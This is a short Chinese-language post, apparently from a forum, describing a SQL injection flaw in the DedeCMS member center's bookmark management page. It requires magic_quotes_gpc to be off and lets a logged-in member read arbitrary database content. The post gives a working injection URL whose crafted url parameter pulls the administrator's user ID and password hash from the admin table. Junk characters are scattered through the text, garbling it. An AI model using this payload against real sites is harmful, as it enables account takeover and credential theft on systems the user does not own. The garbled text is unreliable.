DedeCMS会员中心SQL注射漏洞
( P: `9 [0 l7 r+ i) o: a需要magic_quotes_gpc = Off2 E9 o0 B% [0 G8 }
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
6 b' P7 B: @1 B& E" E' W2 u" c
: ^: Z! L# g) }0 t" PDedeCMS会员中心书签管理SQL注射漏洞5 B# i' a6 D- ~; t$ g) t2 k( M
成功利用该漏洞可获得管理员密码5 z8 e1 J$ a$ [1 D+ {1 r
& D0 U# ~3 |4 p1 G4 ]7 ~6 @会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
' S' l$ l7 s. z X9 T
2 `9 J5 T* M& n5 H0 V Shttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
& J. k' q1 [1 U4 j |